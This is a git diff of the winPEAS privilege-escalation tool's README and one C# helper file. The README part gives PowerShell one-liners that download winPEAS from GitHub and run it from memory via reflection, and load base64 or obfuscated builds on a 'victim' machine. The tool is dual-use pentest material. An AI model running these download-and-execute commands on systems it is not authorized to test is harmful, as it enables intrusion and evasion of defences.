-- Non-Obfuscated [winPEASx86.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe)
+- Download the **[latest obfuscated and not obfuscated versions from here](https://github.com/carlospolop/PEASS-ng/releases/latest)** or **compile it yourself** (read instructions for compilation).
 
 ```bash
-#One liner to download and execute winPEASany from memory in a PS shell
-$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASany.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
+# Get latest release
+$latestRelease = Invoke-WebRequest https://github.com/carlospolop/PEASS-ng/releases/latest -Headers @{"Accept"="application/json"}
+$json = $latestRelease.Content | ConvertFrom-Json
+$latestVersion = $json.tag_name
+$url = "https://github.com/carlospolop/PEASS-ng/releases/download/$latestVersion/winPEASany_ofs.exe"
 
-#Before cmd in 3 lines
-$url = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe"
+# One liner to download and execute winPEASany from memory in a PS shell
+$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
+
+# Before cmd in 3 lines
 $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
 [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
 
-#Load from disk in memory and execute:
+# Load from disk in memory and execute:
 $wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe")));
 [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
 
-#Load from disk in base64 and execute
+# Load from disk in base64 and execute
 ##Generate winpeas in Base64:
 [Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt
 ##Now upload the B64 string to the victim inside a file or copy it to the clipboard
@@ -44,7 +46,7 @@ $thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string
 $wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent))
 [winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use
 
-#Loading from file and executing a winpeas obfuscated version
+# Loading from file and executing a winpeas obfuscated version
 ##Load obfuscated version
 $wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe")));
 $wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program"
@@ -282,8 +284,5 @@ If you find any issue, please report it using **[github issues](https://github.c
 
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
-## License
-
-MIT License
 
 By Polop<sup>(TM)</sup>, makikvues (makikvues2[at]gmail[dot].com)

winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs

@@ -17,7 +17,7 @@ namespace winPEAS.Helpers
         static string LYELLOW = "\x1b[1;33m";
         static string BLUE = "\x1b[34m";
         public static string LBLUE = "\x1b[1;34m";
-        static string MAGENTA = "\x1b[1:35m";
+        static string MAGENTA = "\x1b[1;35m";
         //static string LMAGENTA = "\x1b[1;35m";
         static string CYAN = "\x1b[36m";
         static string LCYAN = "\x1b[1;36m";